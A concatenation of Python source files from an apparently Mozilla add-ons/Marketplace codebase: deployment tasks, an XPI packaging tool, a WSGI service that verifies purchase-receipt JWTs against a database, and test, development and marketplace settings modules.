def compress_assets(ctx, arg=''):
with ctx.lcd(settings.SRC_DIR):
ctx.local("%s manage.py compress_assets -t %s" % (settings.PYTHON,
arg))
@task
def schematic(ctx):
with ctx.lcd(settings.SRC_DIR):
ctx.local("%s %s/bin/schematic migrations" %
(settings.PYTHON, VIRTUALENV))
@task
def update_code(ctx, ref='origin/master'):
with ctx.lcd(settings.SRC_DIR):
ctx.local("git fetch && git fetch -t")
ctx.local("git reset --hard %s" % ref)
ctx.local("git submodule sync")
ctx.local("git submodule update --init --recursive")
# Recursively run submodule sync/update to get all the right repo URLs.
ctx.local("git submodule foreach 'git submodule sync --quiet'")
ctx.local("git submodule foreach "
"'git submodule update --init --recursive'")
@task
def update_info(ctx, ref='origin/master'):
with ctx.lcd(settings.SRC_DIR):
ctx.local("git status")
ctx.local("git log -1")
ctx.local("/bin/bash -c "
"'source /etc/bash_completion.d/git && __git_ps1'")
ctx.local('git show -s {0} --pretty="format:%h" '
'> media/git-rev.txt'.format(ref))
@task
def checkin_changes(ctx):
ctx.local(settings.DEPLOY_SCRIPT)
@task
def disable_cron(ctx):
ctx.local("rm -f /etc/cron.d/%s" % settings.CRON_NAME)
@task
def install_cron(ctx):
with ctx.lcd(settings.SRC_DIR):
ctx.local('%s ./scripts/crontab/gen-cron.py '
'-z %s -u apache -p %s > /etc/cron.d/.%s' %
(settings.PYTHON, settings.SRC_DIR,
settings.PYTHON, settings.CRON_NAME))
ctx.local('mv /etc/cron.d/.%s /etc/cron.d/%s' % (settings.CRON_NAME,
settings.CRON_NAME))
@hostgroups(settings.WEB_HOSTGROUP,
remote_kwargs={'ssh_key': settings.SSH_KEY})
def sync_code(ctx):
ctx.remote(settings.REMOTE_UPDATE_SCRIPT)
@hostgroups(settings.WEB_HOSTGROUP,
remote_kwargs={'ssh_key': settings.SSH_KEY})
def restart_workers(ctx):
for gservice in settings.GUNICORN:
ctx.remote("/sbin/service %s graceful" % gservice)
for gservice in getattr(settings, 'MULTI_GUNICORN', []):
ctx.remote("/sbin/service %s-a graceful" % gservice)
ctx.remote("/sbin/service %s-b graceful" % gservice)
@task
def deploy_app(ctx):
sync_code()
restart_workers()
@hostgroups(settings.CELERY_HOSTGROUP,
remote_kwargs={'ssh_key': settings.SSH_KEY})
def update_celery(ctx):
ctx.remote(settings.REMOTE_UPDATE_SCRIPT)
if getattr(settings, 'CELERY_SERVICE_PREFIX', False):
ctx.remote("/sbin/service %s restart" % settings.CELERY_SERVICE_PREFIX)
ctx.remote("/sbin/service %s-devhub restart" %
settings.CELERY_SERVICE_PREFIX)
ctx.remote("/sbin/service %s-priority restart" %
settings.CELERY_SERVICE_PREFIX)
if getattr(settings, 'CELERY_SERVICE_MKT_PREFIX', False):
ctx.remote("/sbin/service %s restart" %
settings.CELERY_SERVICE_MKT_PREFIX)
ctx.remote("/sbin/service %s-devhub restart" %
settings.CELERY_SERVICE_MKT_PREFIX)
ctx.remote("/sbin/service %s-priority restart" %
settings.CELERY_SERVICE_MKT_PREFIX)
@task
def deploy(ctx):
install_cron()
checkin_changes()
deploy_app()
update_celery()
with ctx.lcd(settings.SRC_DIR):
ctx.local('%s manage.py cron cleanup_validation_results' %
settings.PYTHON)
@task
def pre_update(ctx, ref=settings.UPDATE_REF):
ctx.local('date')
disable_cron()
update_code(ref)
update_info(ref)
@task
def update(ctx):
create_virtualenv()
update_locales()
update_products()
compress_assets()
compress_assets(arg='--settings=settings_local_mkt')
schematic()
with ctx.lcd(settings.SRC_DIR):
ctx.local('%s manage.py dump_apps' % settings.PYTHON)
ctx.local('%s manage.py statsd_ping --key=update' % settings.PYTHON)
########NEW FILE########
__FILENAME__ = xpitool
#!/usr/bin/env python
import optparse
import os
import subprocess
def main():
p = optparse.OptionParser(
usage='%prog [options] [-x addon-1.0.xpi] [-c /path/to/addon-1.0/]')
p.add_option('-x', '--extract',
help='Extracts xpi into current directory',
action='store_true')
p.add_option('-c', '--recreate',
help='Zips an extracted xpi into current directory',
action='store_true')
(options, args) = p.parse_args()
if len(args) != 1:
p.error("Incorrect usage")
addon = os.path.abspath(args[0])
if options.extract:
d = os.path.splitext(addon)[0]
os.mkdir(d)
os.chdir(d)
subprocess.check_call(['unzip', addon])
print "Extracted to %s" % d
elif options.recreate:
xpi = "%s.xpi" % addon
if os.path.exists(xpi):
p.error("Refusing to overwrite %r" % xpi)
os.chdir(addon)
subprocess.check_call(['zip', '-r', xpi] + os.listdir(os.getcwd()))
print "Created %s" % xpi
else:
p.error("Incorrect usage")
if __name__ == '__main__':
main()
########NEW FILE########
__FILENAME__ = utils
import dictconfig
import logging
import os
# get the right settings module
settingmodule = os.environ.get('DJANGO_SETTINGS_MODULE', 'settings_local')
if settingmodule.startswith(('zamboni', # typical git clone destination
'workspace', # Jenkins
'project', # vagrant VM
'freddo')):
settingmodule = settingmodule.split('.', 1)[1]
import sys
import MySQLdb as mysql
import sqlalchemy.pool as pool
from django.utils import importlib
settings = importlib.import_module(settingmodule)
from constants.payments import (CONTRIB_CHARGEBACK, CONTRIB_NO_CHARGE,
CONTRIB_PURCHASE, CONTRIB_REFUND)
from lib.log_settings_base import formatters, handlers
def getconn():
db = settings.SERVICES_DATABASE
return mysql.connect(host=db['HOST'], user=db['USER'],
passwd=db['PASSWORD'], db=db['NAME'])
mypool = pool.QueuePool(getconn, max_overflow=10, pool_size=5, recycle=300)
def log_configure():
"""You have to call this to explicity configure logging."""
cfg = {
'version': 1,
'filters': {},
'formatters': dict(prod=formatters['prod']),
'handlers': dict(syslog=handlers['syslog']),
'loggers': {
'z': {'handlers': ['syslog'], 'level': logging.INFO},
},
'root': {},
# Since this configuration is applied at import time
# in verify.py we don't want it to clobber other logs
# when imported into the marketplace Django app.
'disable_existing_loggers': False,
}
dictconfig.dictConfig(cfg)
def log_exception(data):
# Note: although this logs exceptions, it logs at the info level so that
# on prod, we log at the error level and result in no logs on prod.
typ, value, discard = sys.exc_info()
error_log = logging.getLogger('z.receipt')
error_log.exception(u'Type: %s, %s. Data: %s' % (typ, value, data))
def log_info(msg):
error_log = logging.getLogger('z.receipt')
error_log.info(msg)
########NEW FILE########
__FILENAME__ = verify
import calendar
import json
from datetime import datetime
from time import gmtime, time
from urlparse import parse_qsl, urlparse
from wsgiref.handlers import format_date_time
import jwt
from browserid.errors import ExpiredSignatureError
from django_statsd.clients import statsd
from receipts import certs
from lib.cef_loggers import receipt_cef
from lib.crypto.receipt import sign
from services.utils import settings
from utils import (CONTRIB_CHARGEBACK, CONTRIB_NO_CHARGE, CONTRIB_PURCHASE,
CONTRIB_REFUND, log_configure, log_exception, log_info,
mypool)
# Go configure the log.
log_configure()
# This has to be imported after the settings (utils).
import receipts # NOQA, used for patching in the tests
status_codes = {
200: '200 OK',
405: '405 Method Not Allowed',
500: '500 Internal Server Error',
}
class VerificationError(Exception):
pass
class InvalidReceipt(Exception):
"""
InvalidReceipt takes a message, which is then displayed back to the app so
they can understand the failure.
"""
pass
class RefundedReceipt(Exception):
pass
class Verify:
def __init__(self, receipt, environ):
self.receipt = receipt
self.environ = environ
# These will be extracted from the receipt.
self.decoded = None
self.addon_id = None
self.user_id = None
self.uuid = None
# This is so the unit tests can override the connection.
self.conn, self.cursor = None, None
def setup_db(self):
if not self.cursor:
self.conn = mypool.connect()
self.cursor = self.conn.cursor()
def check_full(self):
"""
This is the default that verify will use, this will
do the entire stack of checks.
"""
receipt_domain = urlparse(settings.WEBAPPS_RECEIPT_URL).netloc
try:
self.decoded = self.decode()
self.check_type('purchase-receipt')
self.check_db()
self.check_url(receipt_domain)
except InvalidReceipt, err:
return self.invalid(str(err))
try:
self.check_purchase()
except InvalidReceipt, err:
return self.invalid(str(err))
except RefundedReceipt:
return self.refund()
return self.ok_or_expired()
def check_without_purchase(self):
"""
This is what the developer and reviewer receipts do, we aren't
expecting a purchase, but require a specific type and install.
"""
try:
self.decoded = self.decode()
self.check_type('developer-receipt', 'reviewer-receipt')
self.check_db()
self.check_url(settings.DOMAIN)
except InvalidReceipt, err:
return self.invalid(str(err))
return self.ok_or_expired()
def check_without_db(self, status):
"""
This is what test receipts do, no purchase or install check.
In this case the return is custom to the caller.
"""
assert status in ['ok', 'expired', 'invalid', 'refunded']
try:
self.decoded = self.decode()
self.check_type('test-receipt')
self.check_url(settings.DOMAIN)
except InvalidReceipt, err:
return self.invalid(str(err))
return getattr(self, status)()
def decode(self):
"""
Verifies that the receipt can be decoded and that the initial
contents of the receipt are correct.
If its invalid, then just return invalid rather than give out any
information.
"""
try:
receipt = decode_receipt(self.receipt)
except:
log_exception({'receipt': '%s...' % self.receipt[:10],
'addon': self.addon_id})
log_info('Error decoding receipt')
raise InvalidReceipt('ERROR_DECODING')
try:
assert receipt['user']['type'] == 'directed-identifier'
except (AssertionError, KeyError):
log_info('No directed-identifier supplied')
raise InvalidReceipt('NO_DIRECTED_IDENTIFIER')
return receipt
def check_type(self, *types):
"""
Verifies that the type of receipt is what we expect.
"""
if self.decoded.get('typ', '') not in types:
log_info('Receipt type not in %s' % ','.join(types))
raise InvalidReceipt('WRONG_TYPE')
def check_url(self, domain):
"""
Verifies that the URL of the verification is what we expect.
:param domain: the domain you expect the receipt to be verified at,
note that "real" receipts are verified at a different domain
from the main marketplace domain.
"""
path = self.environ['PATH_INFO']
parsed = urlparse(self.decoded.get('verify', ''))
if parsed.netloc != domain:
log_info('Receipt had invalid domain')
raise InvalidReceipt('WRONG_DOMAIN')
if parsed.path != path:
log_info('Receipt had the wrong path')
raise InvalidReceipt('WRONG_PATH')
def check_db(self):
"""
Verifies the decoded receipt against the database.
Requires that decode is run first.
"""
if not self.decoded:
raise ValueError('decode not run')
self.setup_db()
# Get the addon and user information from the installed table.
try:
self.uuid = self.decoded['user']['value']
except KeyError:
# If somehow we got a valid receipt without a uuid
# that's a problem. Log here.
log_info('No user in receipt')
raise InvalidReceipt('NO_USER')
try:
storedata = self.decoded['product']['storedata']
self.addon_id = int(dict(parse_qsl(storedata)).get('id', ''))
except:
# There was some value for storedata but it was invalid.
log_info('Invalid store data')
raise InvalidReceipt('WRONG_STOREDATA')
def check_purchase(self):
"""
Verifies that the app has been purchased.
"""
sql = """SELECT id, type FROM addon_purchase
WHERE addon_id = %(addon_id)s
AND uuid = %(uuid)s LIMIT 1;"""
self.cursor.execute(sql, {'addon_id': self.addon_id,
'uuid': self.uuid})
result = self.cursor.fetchone()
if not result:
log_info('Invalid receipt, no purchase')
raise InvalidReceipt('NO_PURCHASE')
if result[-1] in (CONTRIB_REFUND, CONTRIB_CHARGEBACK):
log_info('Valid receipt, but refunded')
raise RefundedReceipt
elif result[-1] in (CONTRIB_PURCHASE, CONTRIB_NO_CHARGE):
log_info('Valid receipt')
return
else:
log_info('Valid receipt, but invalid contribution')
raise InvalidReceipt('WRONG_PURCHASE')
def invalid(self, reason=''):
receipt_cef.log(self.environ, self.addon_id, 'verify',
'Invalid receipt')
return {'status': 'invalid', 'reason': reason}
def ok_or_expired(self):
# This receipt is ok now let's check it's expiry.
# If it's expired, we'll have to return a new receipt
try:
expire = int(self.decoded.get('exp', 0))
except ValueError:
log_info('Error with expiry in the receipt')
return self.expired()
now = calendar.timegm(gmtime()) + 10 # For any clock skew.
if now > expire:
log_info('This receipt has expired: %s UTC < %s UTC'
% (datetime.utcfromtimestamp(expire),
datetime.utcfromtimestamp(now)))
return self.expired()
return self.ok()
def ok(self):
return {'status': 'ok'}
def refund(self):
receipt_cef.log(self.environ, self.addon_id, 'verify',
'Refunded receipt')
return {'status': 'refunded'}
def expired(self):
receipt_cef.log(self.environ, self.addon_id, 'verify',
'Expired receipt')
if settings.WEBAPPS_RECEIPT_EXPIRED_SEND:
self.decoded['exp'] = (calendar.timegm(gmtime()) +
settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS)
# Log that we are signing a new receipt as well.
receipt_cef.log(self.environ, self.addon_id, 'sign',
'Expired signing request')
return {'status': 'expired',
'receipt': sign(self.decoded)}
return {'status': 'expired'}
def get_headers(length):
return [('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Methods', 'POST'),
('Content-Type', 'application/json'),
('Content-Length', str(length)),
('Cache-Control', 'no-cache'),
('Last-Modified', format_date_time(time()))]
def decode_receipt(receipt):
"""
Cracks the receipt using the private key. This will probably change
to using the cert at some point, especially when we get the HSM.
"""
with statsd.timer('services.decode'):
if settings.SIGNING_SERVER_ACTIVE:
verifier = certs.ReceiptVerifier(valid_issuers=
settings.SIGNING_VALID_ISSUERS)
try:
result = verifier.verify(receipt)
except ExpiredSignatureError:
# Until we can do something meaningful with this, just ignore.
return jwt.decode(receipt.split('~')[1], verify=False)
if not result:
raise VerificationError()
return jwt.decode(receipt.split('~')[1], verify=False)
else:
key = jwt.rsa_load(settings.WEBAPPS_RECEIPT_KEY)
raw = jwt.decode(receipt, key)
return raw
def status_check(environ):
output = ''
# Check we can read from the users_install table, should be nice and
# fast. Anything that fails here, connecting to db, accessing table
# will be an error we need to know about.
if not settings.SIGNING_SERVER_ACTIVE:
return 500, 'SIGNING_SERVER_ACTIVE is not set'
try:
conn = mypool.connect()
cursor = conn.cursor()
cursor.execute('SELECT id FROM users_install ORDER BY id DESC LIMIT 1')
except Exception, err:
return 500, str(err)
return 200, output
def receipt_check(environ):
output = ''
with statsd.timer('services.verify'):
data = environ['wsgi.input'].read()
try:
verify = Verify(data, environ)
return 200, json.dumps(verify.check_full())
except:
log_exception('<none>')
return 500, ''
return output
def application(environ, start_response):
body = ''
path = environ.get('PATH_INFO', '')
if path == '/services/status/':
status, body = status_check(environ)
else:
# Only allow POST through as per spec.
if environ.get('REQUEST_METHOD') != 'POST':
status = 405
else:
status, body = receipt_check(environ)
start_response(status_codes[status], get_headers(len(body)))
return [body]
########NEW FILE########
__FILENAME__ = receiptverify
import os
import site
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings_local_mkt'
wsgidir = os.path.dirname(__file__)
for path in ['../',
'../..',
'../../..',
'../../vendor/lib/python',
'../../apps']:
site.addsitedir(os.path.abspath(os.path.join(wsgidir, path)))
from verify import application
########NEW FILE########
__FILENAME__ = settings_test
import atexit
import os
import tempfile
from lib.settings_base import ROOT
from django.utils.functional import lazy
_tmpdirs = set()
def _cleanup():
try:
import sys
import shutil
except ImportError:
return
tmp = None
try:
for tmp in _tmpdirs:
shutil.rmtree(tmp)
except Exception, exc:
sys.stderr.write("\n** shutil.rmtree(%r): %s\n" % (tmp, exc))
atexit.register(_cleanup)
def _polite_tmpdir():
tmp = tempfile.mkdtemp()
_tmpdirs.add(tmp)
return tmp
# See settings.py for documentation:
IN_TEST_SUITE = True
NETAPP_STORAGE = _polite_tmpdir()
ADDONS_PATH = _polite_tmpdir()
GUARDED_ADDONS_PATH = _polite_tmpdir()
SIGNED_APPS_PATH = _polite_tmpdir()
SIGNED_APPS_REVIEWER_PATH = _polite_tmpdir()
UPLOADS_PATH = _polite_tmpdir()
MIRROR_STAGE_PATH = _polite_tmpdir()
TMP_PATH = _polite_tmpdir()
COLLECTIONS_ICON_PATH = _polite_tmpdir()
REVIEWER_ATTACHMENTS_PATH = _polite_tmpdir()
DUMPED_APPS_PATH = _polite_tmpdir()
AUTHENTICATION_BACKENDS = (
'django_browserid.auth.BrowserIDBackend',
)
# We won't actually send an email.
SEND_REAL_EMAIL = True
# Turn off search engine indexing.
USE_ELASTIC = False
# Ensure all validation code runs in tests:
VALIDATE_ADDONS = True
PAYPAL_PERMISSIONS_URL = ''
ENABLE_API_ERROR_SERVICE = False
SITE_URL = 'http://testserver'
STATIC_URL = SITE_URL + '/'
MOBILE_SITE_URL = ''
MEDIA_URL = '/media/'
# Reset these URLs to the defaults so your settings_local doesn't clobber them:
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + '/img/addon-icons'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
ADDON_ICON_URL = (STATIC_URL +
'img/uploads/addon_icons/%s/%s-%s.png?modified=%s')
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
CACHES = {
'default': {
'BACKEND': 'caching.backends.locmem.LocMemCache',
}
}
# COUNT() caching can't be invalidated, it just expires after x seconds. This
# is just too annoying for tests, so disable it.
CACHE_COUNT_TIMEOUT = -1
# No more failures!
APP_PREVIEW = False
# Overrides whatever storage you might have put in local settings.
DEFAULT_FILE_STORAGE = 'amo.utils.LocalFileStorage'
VIDEO_LIBRARIES = ['lib.video.dummy']
ALLOW_SELF_REVIEWS = True
# Make sure debug toolbar output is disabled so it doesn't interfere with any
# html tests.
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': lambda r: False,
'HIDE_DJANGO_SQL': True,
'TAG': 'div',
'ENABLE_STACKTRACES': False,
}
MOZMARKET_VENDOR_EXCLUDE = []
# These are the default languages. If you want a constrainted set for your
# tests, you should add those in the tests.
def lazy_langs(languages):
from product_details import product_details
if not product_details.languages:
return {}
return dict([(i.lower(), product_details.languages[i]['native'])
for i in languages])
AMO_LANGUAGES = (
'af', 'ar', 'bg', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa',
'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sv-SE', 'uk', 'vi',
'zh-CN', 'zh-TW',
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
TASK_USER_ID = '4043307'
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher',
)
SQL_RESET_SEQUENCES = False
GEOIP_URL = ''
GEOIP_DEFAULT_VAL = 'restofworld'
GEOIP_DEFAULT_TIMEOUT = .2
ES_DEFAULT_NUM_REPLICAS = 0
ES_DEFAULT_NUM_SHARDS = 3
IARC_MOCK = True
# Ensure that exceptions aren't re-raised.
DEBUG_PROPAGATE_EXCEPTIONS = False
PAYMENT_PROVIDERS = ['bango']
# When not testing this specific feature, make sure it's off.
PRE_GENERATE_APKS = False
# This is a precaution in case something isn't mocked right.
PRE_GENERATE_APK_URL = 'http://you-should-never-load-this.com/'
# A sample key for signing receipts.
WEBAPPS_RECEIPT_KEY = os.path.join(ROOT, 'mkt/webapps/tests/sample.key')
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'djpymemcache.backend.PyMemcacheCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
}
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'amqp': {'level': logging.WARNING},
'raven': {'level': logging.WARNING},
'requests': {'level': logging.WARNING},
'z.addons': {'level': logging.DEBUG},
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-altdev'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_altdev' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing-mkt-dev.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
MONOLITH_SERVER = 'https://monolith-dev.allizom.org'
GEOIP_URL = 'https://geo-dev-marketplace.allizom.org'
AWS_ACCESS_KEY_ID = private.AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = private.AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME = private.AWS_STORAGE_BUCKET_NAME
RAISE_ON_SIGNAL_ERROR = True
API_THROTTLE = False
NEWRELIC_WHITELIST = ['dev1.addons.phx1.mozilla.com',
'dev2.addons.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = "marketplace-altdev.allizom.org"
SERVER_EMAIL = '[email protected]'
SITE_URL = 'https://marketplace-altdev.allizom.org'
SERVICES_URL = SITE_URL
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-altdev-cdn.allizom.org/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
CSP_FONT_SRC = CSP_FONT_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (
STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'altdev.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplacedev"
SYSLOG_TAG2 = "http_app_addons_marketplacedev_timer"
SYSLOG_CSP = "http_app_addons_marketplacedev_csp"
STATSD_PREFIX = 'marketplace-dev'
# Redis
REDIS_BACKEND = getattr(private_mkt, 'REDIS_BACKENDS_CACHE', private.REDIS_BACKENDS_CACHE)
REDIS_BACKENDS_CACHE_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_CACHE_SLAVE', private.REDIS_BACKENDS_CACHE_SLAVE)
REDIS_BACKENDS_MASTER = getattr(private_mkt, 'REDIS_BACKENDS_MASTER', private.REDIS_BACKENDS_MASTER)
REDIS_BACKENDS_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_SLAVE', private.REDIS_BACKENDS_SLAVE)
REDIS_BACKENDS = {
'cache': REDIS_BACKEND,
'cache_slave': REDIS_BACKENDS_CACHE_SLAVE,
'master': REDIS_BACKENDS_MASTER,
'slave': REDIS_BACKENDS_SLAVE,
}
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = False
SENTRY_DSN = private_mkt.SENTRY_DSN
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
SOLITUDE_HOSTS = ('https://payments-dev.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://marketplace-dev.allizom.org',
'https://marketplace-altdev.allizom.org']
